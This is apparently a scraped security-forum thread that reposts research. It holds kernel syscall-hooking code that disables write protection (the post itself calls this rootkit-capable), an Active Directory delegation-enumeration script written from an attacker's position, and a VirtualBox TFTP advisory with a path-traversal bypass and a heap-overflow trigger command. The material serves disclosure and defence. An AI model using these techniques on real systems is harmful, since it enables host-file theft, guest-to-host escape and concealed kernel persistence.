for the Tianfu Cup; you can read about his strategy for obtaining tfp0. Conclusion This post looked at the discovery and exploitation of P0 issue 1731, an IPC voucher reference counting issue rooted in failing to follow MIG semantics for inout objects. When run a few seconds after a fresh boot, the exploit strategy discussed here is quite reliable: on the devices I've tested, the exploit succeeds upwards of 99% of the time. The exploit is also straightforward enough that, when successful, it allows us to clean up all leaked resources and leave the system in a completely stable state. In a way, it's surprising that such "easy" vulnerabilities still exist: after all, XNU is open source and heavily scrutinized for valuable bugs like this. However, MIG semantics are very unintuitive and don't align well with the natural patterns for writing secure kernel code. While I'd love to believe that this is the last major MIG bug, I wouldn't be surprised to see at least a few more crop up. This bug is also a good reminder that placeholder code can also introduce security vulnerabilities and should be scrutinized as tightly as functional code, no matter how simple it may seem. And finally, it's worth noting that the biggest headache for me while exploiting this bug, the limited range of allowed reference count values, wasn't even an issue on iOS versions prior to 12. On earlier platforms, this bug would have always been incredibly reliable, not just directly after a clean boot. Thus, it's good to see that even though os_refcnt_t didn't stop this bug from being exploited, the mitigation at least impacts exploit reliability, and probably decreases the value of bugs like this to attackers. My next post will show how to use this exploit to analyze Apple's implementation of Pointer Authentication, culminating in a technique that allows us to forge PACs for pointers signed with the A keys. This is sufficient to call arbitrary kernel functions or execute arbitrary code in the kernel via JOP. Posted by Ben at 10:15 AM Sursa: https://googleprojectzero.blogspot.com/2019/01/voucherswap-exploiting-mig-reference.html
  7. Nytro

    Why...???

    Cel mai probabil se trimite un request de scos din blacklist catre ei. Cum si unde? Nu am idee.
  8. Nytro

    Why...???

    Probabil search engine-ul lor a gasit cine stie ce lucruri interesante pe la noi (e.g. cod?) si RST a fost blacklistat.
  9. Da, limita de varsta trebuie respectata. E important: in acest an concursul se va desfasura in Romania si ar fi bine ca Romania sa faca o impresie buna. Recomand tuturor celor pasionati de security sa se inscrie. Cateva detalii despre cum a fost anul trecut sunt disponibile in prezentarea unuia dintre baietii care a participat anul trecut:
  10. S-au deschis înscrierile pentru Campionatul European de Securitate Cibernetică 2019 Recomandat Ioana Tanase Marți, 29 Ianuarie 2019 12:29 La sediul CERT-RO a avut loc o nouă întâlnire dedicată organizării European Cyber Security Championship (ECSC) în România. La întrevedere au participat reprezentanţi ai CERT-RO, SRI şi ANSSI, organizatori tradiţionali ai competiţiei în România, dar şi susţinători sau posibili sponsori din spaţiul public sau privat. Discuţiile s-au concentrat pe organizarea fazei naţionale a competiţiei, precum şi etapa finală din luna octombrie, care va avea loc la Bucureşti. ECSC este un concurs la nivel european, care are ca temă securitatea cibernetică. Proiectul este susţinut anual de către European Union Agency for Network Internet Security (ENISA). În cadrul ECSC, echipele fiecărui stat participant sunt implicate atât în exerciţii de colaborare, cât şi în competiţie. Probele campionatului acoperă domenii precum securitate web, securitate mobilă, puzzleuri criptografice, inginerie inversă şi investigaţii. Concursul are o etapă naţională, prin care se face selecţia echipei României, pregătitoare pentru întrecerea finală, la nivel european. Participanţii care vor să se înscrie în competiţie trebuie să îndeplinească următoarele criterii: vârsta cuprinsă între 16 şi 25 de ani; cetăţeni ai ţării pentru care participă sau locuiesc şi urmează o formă de învăţământ în această ţară. Echipele sunt formate din 2 (maxim 3) antrenori şi maxim 10 concurenţi din 2 categorii: 5 juniori (între 16 şi 20 ani) şi 5 seniori (între 21 şi 25 ani). Vârsta de referinţă este vârsta concurentului la sfarsitul anului calendaristic. În 2018, echipa României a ocupat locul al doilea dintr-un total de 10 ţări participante la ediţia din acest an a Campionatului European de Securitate Cibernetică (ECSC) desfăşurat la Duesseldorf, în Germania, în perioada 7 - 10 noiembrie 2018. Aceasta este cea mai bună performanţă înregistrată de România în cadrul competiţiei europene şi se datorează atât experienţei acumulate în etapa anterioară şi pregătirii susţinute a membrilor echipei pe parcursul acestui an, cât şi dedicării instructorilor care le-au fost alături celor 10 componenţi ai lotului. În acelaşi timp, echipa României s-a bucurat de aprecierea juriului, fiind desemnată pentru al doilea an la rând drept echipa cu cea mai bună expunere a modului în care au rezolvat sarcinile de concurs. Inscriere: http://www.cybersecuritychallenge.ro/ Sursa: https://www.monitoruldegalati.ro/national/s-au-deschis-inscrierile-pentru-campionatul-european-de-securitate-cibernetica-2019.html
  11. ShellcodeCompiler was updated! It uses now @keystone_engine to assemble shellcodes! https://github.com/NytroRST/ShellcodeCompiler
  12. Bug reparat: http://xssfuzzer.com/
  13. Am abuzat de energizante si nu a fost bine. Am renuntat complet la ele. Somnul e baza. Cat se poate, e util din multe puncte de vedere si nicio substanta nu il poate inlocui.
  14. Depinde de tine. Sunt lucruri diferite. Pentester e mai mult pe parte de "atacator" pe cand security analyst e mai mult pe partea de aparare.
  15. Hunting the Delegation Access January 17, 2019 Active Directory (AD) delegation is a fascinating subject, and we have previously discussed it in a blog post and later in a webinar. To summarize, Active Directory has a capability to delegate certain rights to non (domain/forest/enterprise) admin users to perform administrative tasks over a specific section of AD. This capability, if miss-configured, can become a major reason for AD compromise. Earlier we only talked about manual analysis for finding such delegations. Another article which can be found here covered multiple other tools which can help in such manual analysis. Today, we are going to look at other possible options to hunt for these delegations across a network in an (semi-)automated manner via scripts. Setting the scene We’ll assume following scenarios: We have previously compromised a low privilege domain user with severe restrictions such as powershell execution disabled via AppLocker. We have a compromised local admin access on a domain joined machine. This local admin access allows us to run unrestricted powershell scripts however we would require the domain login to perform enumeration on the AD domain. To achieve that, we will use two different approaches: Using AD ACLScanner (Semi Automated) and Using Custom Powershell Script by NSS (Fully Automated) Using ADACLScanner This tool is written by canix1 and is useful for generic ACL scanning. It can be found on github (https://github.com/canix1/ADACLScanner). We can repurpose this tool to perform the tasks of AD delegation hunting. We will explain this process with the help of an example below: When you run a powershell script from ADACLScanner you are greeted with a nice GUI (one of the rare tools in powershell with a nice GUI). ADACLScanner So let’s say, we connect to one of the AD named “plum”, available at 192.168.3.215 as shown in the screenshot below. Connecting to AD When we click on connect in the first column, we will be prompted to enter a domain credential so that it can enumerate the node. It should be noted that this domain credential could be of any low privilege user in the domain. Requesting Domain Credentials Once we enter the domain credentials correctly, we will be shown the available nodes, as shown below. Listing AD Nodes Now all we got to do is highlight the node in the first column, make sure inherited permissions is unticked and click on run scan. In the above scenario we selected the highest node that is “DC=plum,DC=local”. The report that is generated after the scan is completed, will look somewhat as shown below. ACL Scanner Report If we highlight Regions node and run the scan then the report will look somewhat different. You can notice that the Object column in the report is giving you details of the node for which ACL report has been extracted. So the OU here is Regions. ACL Report for Regions OU Similarly if you run scan for the USA OU from objects column as shown below, the report will state the delegation permissions for the OU of USA. AD ACL Scanner report for OU USA The hassle here is that you have to manually hunt every node and then analyze every entry to find the correct delegation. It is fine for a small network but the task may become a nightmare if you are dealing with a large network. This is where our second approach could be useful. Using Custom Powershell Script by NSS Let me first show you the working of this script which has been prepared by our team If you are only concerned about the automated script, here is the online version of it go and grab it. If you are interested in internal working of the script here is a block by block breakdown of the script. Getting User Credentials and AD Drive Hack We started with a non-domain, but local admin user. This is the reason that we get the below listed error whenever we try to mount an AD Drive or import active directory modules. AD Module Import Error To get around this, we passed “-WarningAction SilentlyContinue” parameter. Let us dissect the script, the first bit reads like below: Import-Module ActiveDirectory -WarningAction SilentlyContinue # force use of specified credentials everywhere $creds=Get-Credential $PSDefaultParameterValues = @{"*-AD*:Credential"=$creds} # GET DC Name $dcname=(Get-ADDomainController).Name New-PSDrive -Name AD -PSProvider ActiveDirectory -Server $dcname -Root //RootDSE/ -Credential $creds Set-Location AD: Here is a better understanding of the command listed above: Since we are performing actions as a non domain user, we started by importing “ActiveDirectory” module with “-WarningAction SilentlyContinue”. This allowed us to import the module but the AD Drive was not mounted. Next we attempted to get Credentials from the user. As user credentials were added we then set “PSDefaultParameterValues” for all Commands with “-AD” in them. Now we attempted to mount the AD Drive with this newly acquired credential and for this we needed a server name which we was seamlessly obtained using the “Get-ADDomainController” commandlet. This would not be required if you are already logged in as a domain user. However we wanted to take the worst case scenario where you might have access to a system as a local admin hence unrestricted powershell access but limited domain user credentials. Navigating Entire OU Get all Domain Names, Organization Units, and individual ADObject $OUs = @(Get-ADDomain | Select-Object -ExpandProperty DistinguishedName) $OUs += Get-ADOrganizationalUnit -Filter * | Select-Object -ExpandProperty DistinguishedName $OUs += Get-ADObject -SearchBase (Get-ADDomain).DistinguishedName -SearchScope OneLevel -LDAPFilter '(objectClass=container)' | Select-Object -ExpandProperty DistinguishedName Let us understand what happens here, the first line executes the “Get-ADDomain” and fetches the column of “DistinguishedName”, the second line adds to the OUs object content of “Get-ADOrganizationalUnit” starting filter is “*” and then taking the distinguished name from those objects. The third line fetches the AD objects of AD domain distinguished names, taking only one level with an “LdapFilter” where object class is container and printing out the “DistinguishedName” column. Adding Exclusions $domain = (Get-ADDomain).Name $groups_to_ignore = ( "$domain\Enterprise Admins", "$domain\Domain Admins") # 'NT AUTHORITY\SYSTEM', 'S-1-5-32-548', 'NT AUTHORITY\SELF' These lines show how we are adding more exclusions to the list. We are first fetching the domain name and post that,providing a list of groups to be ignored. Extracting Relevant Domain User/Group Permissions ForEach ($OU in $OUs) { $report += Get-Acl -Path "AD:\$OU" | Select-Object -ExpandProperty Access | ? {$_.IdentityReference -match "$domain*" -and $_.IdentityReference -notin $groups_to_ignore} | Select-Object @{name='organizationalUnit';expression={$OU}}, ` @{name='objectTypeName';expression={if ($_.objectType.ToString() -eq '00000000-0000-0000-0000-000000000000') {'All'} Else {$schemaIDGUID.Item($_.objectType)}}}, ` @{name='inheritedObjectTypeName';expression={$schemaIDGUID.Item($_.inheritedObjectType)}}, ` * } As we saw previously in second step (i.e. during navigation), we stored all the information in the $OUs, now here we are using a “ForEach” loop to extract all the information and process it. The first three lines in the ForEach loop fetches the ACL path of all the entities in the $OUs by ensuring there is a match of “IdentityReference” with the Domain and not a part of the Groups to ignore list. The Groups to ignore list can be seen in step 4. Continuing from Line 4 the command basically selects objects like organizationalUnit with Expression of the entity in the $OUs and “ObjectTypeName” with condition that if the object type is equal to root GUID else fetch the details of the “SchemaIDGUID” based on the object type value. Inheritance == False Inheritance as false is the key to everything. We need only the lines where inheritance is false. $filterrep= $report | Where-Object {-not $_.IsInherited} This ensures that inherited objects are not shown in the output. Array Conversion Array to Console Table Write-Output ( $filterrep | Select-Object OrganizationalUnit,ObjectTypeName,ActiveDirectoryRights,IdentityReference | Format-Table | Out-String) This finally results in a neatly formatted table with list of users having any non-inherited i.e. delegated rights on specific objects. By Default, the delegated rights cascade down the OU tree so if top level OU has the rights, it would automatically cascade down to the next OU section unless and until explicitly removed. Result of Automated Script <shameless plug> This, and other such useful techniques, have been demonstrated in our latest Advanced Infrastructure Hacking course – 2019 edition. We also provide in-house training and CTF’s for internal security and SOC teams to help them advance their skill sets. </shameless plug> Sursa: https://www.notsosecure.com/hunting-the-delegation-access/
  16. How to write a rootkit without really trying POST JANUARY 17, 2019 LEAVE A COMMENT We open-sourced a fault injection tool, KRF, that uses kernel-space syscall interception. You can use it today to find faulty assumptions (and resultant bugs) in your programs. Check it out! This post covers intercepting system calls from within the Linux kernel, via a plain old kernel module. We’ll go through a quick refresher on syscalls and why we might want to intercept them and then demonstrate a bare-bones module that intercepts the read(2) syscall. But first, you might be wondering: What makes this any different from $other_fault_injection_strategy? Other fault injection tools rely on a few different techniques: There’s the well-known LD_PRELOAD trick, which really intercepts the syscall wrapper exposed by libc (or your language runtime of choice). This often works (and can be extremely useful for e.g. spoofing the system time within a program or using SOCKS proxies transparently), but comes with some major downsides: LD_PRELOAD only works when libc (or the target library of choice) has been dynamically linked, but newer languages (read: Go) and deployment trends (read: fully static builds and non-glibc Linux containers) have made dynamic linkage less popular. Syscall wrappers frequently deviate significantly from their underlying syscalls: depending on your versions of Linux and glibc open() may call openat(2), fork() may call clone(2), and other calls may modify their flags or default behavior for POSIX compliance. As a result, it can be difficult to reliably predict whether a given syscall wrapper invokes its syscall namesake. Dynamic instrumentation frameworks like DynamoRIO or Intel PIN can be used to identify system calls at either the function or machine-code level and instrument their calls and/or returns. While this grants us fine-grained access to individual calls, it usually comes with substantial runtime overhead. Injecting faults within kernelspace sidesteps the downsides of both of these approaches: it rewrites the actual syscalls directly instead of relying on the dynamic loader, and it adds virtually no runtime overhead (beyond checking to see whether a given syscall is one we’d like to fault). What makes this any different from $other_blog_post_on_syscall_interception? Other blog posts address the interception of syscalls, but many: Grab the syscall table by parsing their kernel’s System.map, which can be unreliable (and is slower than the approach we give below). Assume that the kernel exports sys_call_table and that extern void *sys_call_table will work (not true on Linux 2.6+). Involve prodding large ranges of kernel memory, which is slow and probably dangerous. Basically, we couldn’t find a recent (>2015) blog post that described a syscall interception process that we liked. So we developed our own. Why not just use eBPF or kprobes? eBPF can’t intercept syscalls. It can only record their parameters and return types. The kprobes API might be able to perform interception from within a kernel module, although I haven’t come across a really good source of information about it online. In any case, the point here is to do it ourselves! Will this work on $architecture? For the most part, yes. You’ll need to make some adjustments to the write-unlocking macro for non-x86 platforms. What’s a syscall? A syscall, or system call, is a function1 that exposes some kernel-managed resource (I/O, process control, networking, peripherals) to user-space processes. Any program that takes user input, communicates with other programs, changes files on disk, uses the system time, or contacts another device over a network (usually) does so via syscalls.2 The core UNIX-y syscalls are fairly primitive: open(2), close(2), read(2), and write(2) for the vast majority of I/O; fork(2), kill(2), signal(2), exit(2), and wait(2) for process management; and so forth. The socket management syscalls are mostly bolted on to the UNIX model: send(2) and recv(2) behave much like read(2) and write(2), but with additional transmission flags. ioctl(2) is the kernel’s garbage dump, overloaded to perform every conceivable operation on a file descriptor where no simpler means exists. Despite these additional complexities in usage, the underlying principle behind their usage (and interception) remains the same. If you’d like to dive all the way in, Filippo Valsorda maintains an excellent Linux syscall reference for x86 and x86_64. Unlike regular function calls in user-space, syscalls are extraordinarily expensive: on x86 architectures, int 80h (or the more modern sysenter/syscall instructions) causes both the CPU and the kernel to execute slow interrupt-handling code paths as well as perform a privilege-context switch.3 Why intercept syscalls? For a few different reasons: We’re interested in gathering statistics about a given syscall’s usage, beyond what eBPF or another instrumentation API could (easily) provide. We’re interested in fault injection that can’t be avoided by static linking or manual syscall(3) invocations (our use case). We’re feeling malicious, and we want to write a rootkit that’s hard to remove from user-space (and possibly even kernel-space, with a few tricks).4 Why do I need fault injection? Fault injection finds bugs in places that fuzzing and conventional unit testing often won’t: NULL dereferences caused by assuming that particular functions never fail (are you sure you always check whether getcwd(2) succeeds?) Are you sure that you’re doing better than systemd? Memory corruption caused by unexpectedly small buffers, or disclosure caused by unexpectedly large buffers Integer over/underflow caused by invalid or unexpected values (are you sure you’re not making incorrect assumptions about stat(2)‘s atime/mtime/ctime fields?) Getting started: Finding the syscall table Internally, the Linux kernel stores syscalls within the syscall table, an array of __NR_syscalls pointers. This table is defined as sys_call_table, but has not been directly exposed as a symbol (to kernel modules) since Linux 2.5. First thing, we need to get the syscall table’s address, ideally without using the System.map file or scanning kernel memory for well-known addresses. Luckily for us, Linux provides a superior interface than either of these: kallsyms_lookup_name. This makes retrieving the syscall table as easy as: 1 2 3 4 5 6 7 8 9 10 11 12 static unsigned long *sys_call_table; int init_module(void) { sys_call_table = (void *)kallsyms_lookup_name("sys_call_table"); if (sys_call_table == NULL) { printk(KERN_ERR "Couldn't look up sys_call_table\n"); return -1; } return 0; } Of course, this only works if your Linux kernel was compiled with CONFIG_KALLSYMS=1. Debian and Ubuntu provide this, but you may need to test in other distros. If your distro doesn’t enable kallsyms by default, consider using a VM for one that does (you weren’t going to test this code on your host, were you?). Injecting our replacement syscalls Now that we have the kernel’s syscall table, injecting our replacement should be as easy as: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 static unsigned long *sys_call_table; static typeof(sys_read) *orig_read; /* asmlinkage is important here -- the kernel expects syscall parameters to be * on the stack at this point, not inside registers. */ asmlinkage long phony_read(int fd, char __user *buf, size_t count) { printk(KERN_INFO "Intercepted read of fd=%d, %lu bytes\n", fd, count); return orig_read(fd, buf, count); } int init_module(void) { sys_call_table = (void *)kallsyms_lookup_name("sys_call_table"); if (sys_call_table == NULL) { printk(KERN_ERR "Couldn't look up sys_call_table\n"); return -1; } orig_read = (typeof(sys_read) *)sys_call_table[__NR_read]; sys_call_table[__NR_read] = (void *)&phony_read; return 0; } void cleanup_module(void) { /* Don't forget to fix the syscall table on module unload, or you'll be in * for a nasty surprise! */ sys_call_table[__NR_read] = (void *)orig_read; } …but it isn’t that easy, at least not on x86: sys_call_table is write-protected by the CPU itself. Attempting to modify it will cause a page fault (#PF) exception.5 To get around this, we twiddle the 16th bit of the cr0 register, which controls the write-protect state: 1 2 3 4 5 6 #define CR0_WRITE_UNLOCK(x) \ do { \ write_cr0(read_cr0() & (~X86_CR0_WP)); \ x; \ write_cr0(read_cr0() | X86_CR0_WP); \ } while (0) Then, our insertions become a matter of: 1 2 3 CR0_WRITE_UNLOCK({ sys_call_table[__NR_read] = (void *)&phony_read; }); and: 1 2 3 CR0_WRITE_UNLOCK({ sys_call_table[__NR_read] = (void *)orig_read; }); and everything works as expected…almost. We’ve assumed a single processor; there’s an SMP-related race condition bug in the way we twiddle cr0. If our kernel task were preempted immediately after disabling write-protect and placed onto another core with WP still enabled, we’d get a page fault instead of a successful memory write. The chances of this happening are pretty slim, but it doesn’t hurt to be careful by implementing a guard around the critical section: 1 2 3 4 5 6 7 8 9 10 11 12 13 #define CR0_WRITE_UNLOCK(x) \ do { \ unsigned long __cr0; \ preempt_disable(); \ __cr0 = read_cr0() & (~X86_CR0_WP); \ BUG_ON(unlikely((__cr0 & X86_CR0_WP))); \ write_cr0(__cr0); \ x; \ __cr0 = read_cr0() | X86_CR0_WP; \ BUG_ON(unlikely(!(__cr0 & X86_CR0_WP))); \ write_cr0(__cr0); \ preempt_enable(); \ } while (0) (The astute will notice that this is almost identical to the “rare write” mechanism from PaX/grsecurity. This is not a coincidence: it’s based on it!) What’s next? The phony_read above just wraps the real sys_read and adds a printk, but we could just as easily have it inject a fault: 1 2 3 asmlinkage long phony_read(int fd, char __user *buf, size_t count) { return -ENOSYS; } …or a fault for a particular user: 1 2 3 4 5 6 7 asmlinkage long phony_read(int fd, char __user *buf, size_t count) { if (current_uid().val == 1005) { return -ENOSYS; } else { return orig_read(fd, buf, count); } } …or return bogus data: 1 2 3 4 5 6 7 8 asmlinkage long phony_read(int fd, char __user *buf, size_t count) { unsigned char kbuf[1024]; memset(kbuf, 'A', sizeof(kbuf)); copy_to_user(buf, kbuf, sizeof(kbuf)); return sizeof(kbuf); } Syscalls happen under task context within the kernel, meaning that the current task_struct is valid. Opportunities for poking through kernel structures abound! Wrap up This post covers the very basics of kernel-space syscall interception. To do anything really interesting (like precise fault injection or statistics beyond those provided by official introspection APIs), you’ll need to read a good kernel module programming guide6 and do the legwork yourself. Our new tool, KRF, does everything mentioned above and more: it can intercept and fault syscalls with per-executable precision, operate on an entire syscall “profile” (e.g., all syscalls that touch the filesystem or perform process scheduling), and can fault in real-time without breaking a sweat. Oh, and static linkage doesn’t bother it one bit: if your program makes any syscalls, KRF will happily fault them. Other work Outside of kprobes for kernel-space interception and LD_PRELOAD for user-space interception of wrappers, there are a few other clever tricks out there: syscall_intercept is loaded through LD_PRELOAD like a normal wrapper interceptor, but actually uses capstone internally to disassemble (g)libc and instrument the syscalls that it makes. This only works on syscalls made by the libc wrappers, but it’s still pretty cool. ptrace(2) can be used to instrument syscalls made by a child process, all within user-space. It comes with two considerable downsides, though: it can’t be used in conjunction with a debugger, and it returns (PTRACE_GETREGS) architecture-specific state on each syscall entry and exit. It’s also slow. Chris Wellons’s awesome blog post covers ptrace(2)‘s many abilities. More of a “service request” than a “function” in the ABI sense, but thinking about syscalls as a special class of functions is a serviceable-enough fabrication. The number of exceptions to this continues to grow, including user-space networking stacks and the Linux kernel’s vDSO for many frequently called syscalls, like time(2). No process context switch is necessary. Linux executes syscalls within the same underlying kernel task that the process belongs to. But a processor context switch does occur. I won’t detail this because it’s outsite of this post’s scope, but consider that init_module(2) and delete_module(2) are just normal syscalls. Sidenote: this is actually how CoW works on Linux. fork(2) write-protects the pre-duplicated process space, and the kernel waits for the corresponding page fault to tell it to copy a page to the child. This one’s over a decade old, but it covers the basics well. If you run into missing symbols or changed signatures, you should find the current equivalents with a quick search. Sursa: https://blog.trailofbits.com/2019/01/17/how-to-write-a-rootkit-without-really-trying/
  17. IPv6 Talks & Publications At first a very happy new year to everybody! While thinking about the agenda of the upcoming Troopers NGI IPv6 Track I realized that quite a lot of IPv6-related topics have been covered in the last years by various IPv6 practitioners (like my colleague Christopher Werny) or researchers (like my friend Antonios Atlasis). In a kind of shameless self plug I then decided to put together of list of IPv6 talks I myself gave at several occasions and of publications I (co-) authored. Please find this list below (sorted by years); you can click on the titles to access the respective documents/sources. I hope some of this can be of help for one or the other among you in the course of your own IPv6 efforts. Cheers, Enno 2018 IPv6 Address Management – The First Five Years Properties of IPv6 and Their Implications for Offense & Defense 2017 Why it might make sense to use IPv6 in enterprise infrastructure projects Position Paper on an Enterprise Organization’s IPv6 Address Strategy Balanced Security for IPv6 CPE Revisited Local Packet Filtering with IPv6 IPv6 Address Selection – A Look from the Lab Why IPv6 Security Is So Hard – Structural Deficits of IPv6 & Their Implications Testing RFC 6980 Implementations with Chiron IPv6 configuration approaches for servers / slides with additional infos IPv6 Properties of Windows Server 2016 / Windows 10 2016 Real Life Use Cases and Challenges When Implementing Link-local Addressing Only Networks as of RFC 7404 IPv6 from a Developers’ Perspective Things to Consider When Deploying IPv6 in Enterprise Space IPv6 & Threat Intelligence Protecting Hosts in IPv6 Networks Remote Access and Business Partner Connections Developing an Enterprise IPv6 Security Strategy Dual Stack vs. IPv6-only in Enterprise Networks Things to Consider When Starting Your IPv6 Deployment IPv6 Address Planning in 2016 / Observations 2015 Developing an Enterprise IPv6 Security Strategy / Part 1: Baseline Analysis of IPv4 Network Security Developing an Enterprise IPv6 Security Strategy / Part 2: Network Isolation on the Routing Layer Developing an Enterprise IPv6 Security Strategy / Part 3: Traffic Filtering in IPv6 Networks (I) Developing an Enterprise IPv6 Security Strategy / Part 4: Traffic Filtering in IPv6 Networks (II) Developing an Enterprise IPv6 Security Strategy / Part 5: First Hop Security Features Developing an Enterprise IPv6 Security Strategy / Part 6: Controls on the Host Level Some Notes on the “Drop IPv6 Fragments” vs. “This Will Break DNS[SEC]” Debate IPv6 Router Advertisement Flags, RDNSS and DHCPv6 Conflicting Configurations Main IPv6 Related Mailing Lists IPv6 in Virtualized Data Centers The Strange Case of $SOME_SOFTWARE Adding an IPv6 Extension Header, and an Internet Router Dropping Them Will It Be Routed? Evasion of Cisco ACLs by (Ab)Using IPv6 IPv6 Address Planning / Some Notes OS IPv6 Behavior in Conflicting Environments What to Do Today if You Want to Deploy IPv6 Tomorrow Is IPv6 more Secure than IPv4? Or Less? IPv6 & Complexity MLD Considered Harmful Reliable & Secure DHCPv6 IPv6-related Requirements for the Internet Uplink or MPLS Networks An MLD Testing Methodology Is RFC 6939 Support Finally Here – Checking the Implementation of the “Client Link Layer Address Option” in DHCPv6 /48 Considered Harmful. On the Interaction of Strict IPv6 Prefix Filtering and the Needs of Enterprise LIRs The Persistent Problem of State in IPv6 (Security) IPv6-related Requirements for Security Devices Evaluation of IPv6 Capabilities of Commercial IPAM Solutions 2014 Security Implications of Using IPv6 GUAs Only Dynamics of IPv6 Prefixes within the LIR Scope in the RIPE NCC Region Evasion of High-End IDPS Devices at the IPv6 Era IPv6 in RFIs/Tendering Processes Protocol Properties & Attack Vectors Router Advertisement Options to the Rescue – A Deep Dive into DHCPv6, Part 2 I Don’t Have Any Neighbors – A Deep Dive into DHCPv6, Part 1 Security Implications of Disruptive Technologies IPv6 for Managers IPv6 Requirements for Cloud Service Providers IPv6 Address Plan Considerations, Part 3: The Plan IPv6 Address Plan Considerations, Part 2: The “PI Space from (Single|Multiple) RIR(s) Debate” IPv6 Address Plan Considerations, Part 1: General Guidelines 2013 Design & Configuration of IPv6 Segments with High Security Requirements IPv6 Capabilities of Commercial Security Components IPAM Requirements in IPv6 Networks IPv6 Neighbor Cache Exhaustion Attacks – Risk Assessment & Mitigation Strategies, Part 1 2012 IPv6 Privacy Extensions 2011 Yet another update on IPv6 security – Some notes from the IPv6-Kongress in Frankfurt IPv6 Security Part 2, RA Guard – Let’s get practical IPv6 Security Part 1, RA Guard – The Theory Sursa: https://insinuator.net/2019/01/ipv6-talks-publications/
  18. VirtualBox TFTP server (PXE boot) directory traversal and heap overflow vulnerabilities - [CVE-2019-2552, CVE-2019-2553] In my previous blog post I wrote about VirtualBox DHCP bugs which can be triggered from an unprivileged guest user, in the default configuration and without Guest Additions installed. TFTP server for PXE boot is another attack surface which can be reached from the same configuration. VirtualBox in NAT mode (default configuration) runs a read only TFTP server in the IP address 10.0.2.4 to support PXE boot. CVE-2019-2553 - Directory traversal vulnerability The source code of the TFTP server is at src/VBox/Devices/Network/slirp/tftp.c and it is based on the TFTP server used in QEMU. The below comment can be found in the source: * This code is based on: * * tftp.c - a simple, read-only tftp server for qemu The guest provided file path is validated using the function tftpSecurityFilenameCheck() as below: /** * This function evaluate file name. * @param pu8Payload * @param cbPayload * @param cbFileName * @return VINF_SUCCESS - * VERR_INVALID_PARAMETER - */ DECLINLINE(int) tftpSecurityFilenameCheck(PNATState pData, PCTFTPSESSION pcTftpSession) { size_t cbSessionFilename = 0; int rc = VINF_SUCCESS; AssertPtrReturn(pcTftpSession, VERR_INVALID_PARAMETER); cbSessionFilename = RTStrNLen((const char *)pcTftpSession->pszFilename, TFTP_FILENAME_MAX); if ( !RTStrNCmp((const char*)pcTftpSession->pszFilename, "../", 3) || (pcTftpSession->pszFilename[cbSessionFilename - 1] == '/') || RTStrStr((const char *)pcTftpSession->pszFilename, "/../")) rc = VERR_FILE_NOT_FOUND; /* only allow exported prefixes */ if ( RT_SUCCESS(rc) && !tftp_prefix) rc = VERR_INTERNAL_ERROR; LogFlowFuncLeaveRC(rc); return rc; } This code again is based on the validation done in QEMU (slirp/tftp.c) /* do sanity checks on the filename */ if (!strncmp(req_fname, "../", 3) || req_fname[strlen(req_fname) - 1] == '/' || strstr(req_fname, "/../")) { tftp_send_error(spt, 2, "Access violation", tp); return; } Interesting observation here is, above validation done in QEMU is specific to Linux hosts. However, VirtualBox relies on the same validation for Windows hosts too. Since backslash can be used as directory separator in Windows, validations done in tftpSecurityFilenameCheck() can be bypassed to read host files accessible under the privileges of the VirtualBox process. The default path to TFTP root folder is C:\Users\\.VirtualBox\TFTP. Payload to read other files from the host needs to be crafted accordingly. Below is the demo: CVE-2019-2552 - Heap overflow due to incorrect validation of TFTP blocksize option The function tftpSessionOptionParse() sets the value of TFTP options DECLINLINE(int) tftpSessionOptionParse(PTFTPSESSION pTftpSession, PCTFTPIPHDR pcTftpIpHeader) { ... else if (fWithArg) { if (!RTStrICmp("blksize", g_TftpDesc[idxOptionArg].pszName)) { rc = tftpSessionParseAndMarkOption(pszTftpRRQRaw, &pTftpSession->OptionBlkSize); if (pTftpSession->OptionBlkSize.u64Value > UINT16_MAX) rc = VERR_INVALID_PARAMETER; } ... 'blksize' option is checked if the value is > UINT16_MAX. Later the value OptionBlkSize.u64Value gets used in tftpReadDataBlock() to read the file content DECLINLINE(int) tftpReadDataBlock(PNATState pData, PTFTPSESSION pcTftpSession, uint8_t *pu8Data, int *pcbReadData) { RTFILE hSessionFile; int rc = VINF_SUCCESS; uint16_t u16BlkSize = 0; . . . AssertReturn(pcTftpSession->OptionBlkSize.u64Value < UINT16_MAX, VERR_INVALID_PARAMETER); . . . u16BlkSize = (uint16_t)pcTftpSession->OptionBlkSize.u64Value; . . . rc = RTFileRead(hSessionFile, pu8Data, u16BlkSize, &cbRead); . . . } pcTftpSession->OptionBlkSize.u64Value < UINT16_MAX validation is incorrect. During the call to RTFileRead(), the file contents can overflow the buffer adjacent to 'pu8Data' by setting a value for blksize greater than the MTU. This bug can be used in combination with directory traversal bug to trigger the heap overflow with controlled data e.g. if shared folders are enabled, guest can drop a file with arbitrary contents in the host, then read the file using directory traversal bug. For the ease of debugging lets use VirtualBox for Linux. Create a file of size say UINT16_MAX in the host TFTP root folder i.e. ~/.config/VirtualBox/TFTP, then read the file from the guest with a large blksize value guest@ubuntu:~$ atftp --trace --verbose --option "blksize 65535" --get -r payload -l payload 10.0.2.4 Thread 30 "NAT" received signal SIGSEGV, Segmentation fault. [Switching to Thread 0x7fff8ccf4700 (LWP 11024)] [----------------------------------registers-----------------------------------] RAX: 0x4141414141414141 ('AAAAAAAA') RBX: 0x7fff8e5f16dc ('A' ...) RCX: 0x1 RDX: 0x4141414141414141 ('AAAAAAAA') RSI: 0x800 RDI: 0x140e730 --> 0x219790326 RBP: 0x7fff8ccf39e0 --> 0x7fff8ccf3a10 --> 0x7fff8ccf3ab0 --> 0x7fff8ccf3bb0 --> 0x7fff8ccf3c90 --> 0x7fff8ccf3cf0 (--> ...) RSP: 0x7fff8ccf39b0 --> 0x7fff8ccf39e0 --> 0x7fff8ccf3a10 --> 0x7fff8ccf3ab0 --> 0x7fff8ccf3bb0 --> 0x7fff8ccf3c90 (--> ...) RIP: 0x7fff9457d8a8 (<slirp_uma_alloc>: mov QWORD PTR [rax+0x20],rdx) R8 : 0x0 R9 : 0x10 R10: 0x41414141 ('AAAA') R11: 0x7fff8e5f1de4 ('A' ...) R12: 0x140e720 --> 0xdead0002 R13: 0x7fff8e5f1704 ('A' ...) R14: 0x140e7b0 --> 0x7fff8e5f16dc ('A' ...) R15: 0x140e730 --> 0x219790326 EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7fff9457d89f <slirp_uma_alloc>: test rax,rax 0x7fff9457d8a2 <slirp_uma_alloc>: je 0x7fff9457d8b0 